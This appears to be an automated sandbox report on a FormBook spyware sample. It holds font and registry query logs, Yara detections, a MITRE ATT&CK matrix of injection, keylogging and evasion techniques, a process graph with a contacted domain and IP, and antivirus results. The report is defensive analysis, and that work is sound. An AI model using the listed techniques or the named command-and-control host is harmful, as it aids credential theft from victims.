            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection712Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection712LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Timestomp1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 458848 Sample: New_1007572_021.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 5 other signatures 2->60 11 New_1007572_021.exe 5 2->11         started        process3 file4 40 C:\Users\user\AppData\...40ew_1007572_021.exe, PE32 11->40 dropped 42 C:\...42ew_1007572_021.exe:Zone.Identifier, ASCII 11->42 dropped 44 C:\Users\user\...44ew_1007572_021.exe.log, ASCII 11->44 dropped 72 Writes to foreign memory regions 11->72 74 Injects a PE file into a foreign processes 11->74 15 New_1007572_021.exe 1 5 11->15         started        signatures5 process6 dnsIp7 48 192.168.2.1 unknown unknown 15->48 36 C:\Users\user\AppData\...\FB_5E87.tmp.exe, PE32 15->36 dropped 38 C:\Users\user\AppData\...\FB_5908.tmp.exe, PE32 15->38 dropped 50 Multi AV Scanner detection for dropped file 15->50 52 Machine Learning detection for dropped file 15->52 20 FB_5E87.tmp.exe 15->20         started        23 FB_5908.tmp.exe 15->23         started        file8 signatures9 process10 signatures11 62 Antivirus detection for dropped file 20->62 64 Multi AV Scanner detection for dropped file 20->64 66 Machine Learning detection for dropped file 20->66 68 5 other signatures 20->68 25 explorer.exe 20->25 injected process12 dnsIp13 46 www.comfsresidential.com 185.53.178.50, 49760, 80 TEAMINTERNET-ASDE Germany 25->46 70 System process connects to network (likely due to code injection or exploit) 25->70 29 cscript.exe 25->29         started        signatures14 process15 signatures16 76 Modifies the context of a thread in another process (thread injection) 29->76 78 Maps a DLL or memory area into another process 29->78 80 Tries to detect virtualization through RDTSC time measurements 29->80 32 cmd.exe 1 29->32         started        process17 process18 34 conhost.exe 32->34         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            New_1007572_021.exe28%ReversingLabsByteCode-MSIL.Spyware.Noon
            New_1007572_021.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe100%AviraTR/Crypt.ZPACK.Gen
            C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe100%Joe Sandbox ML
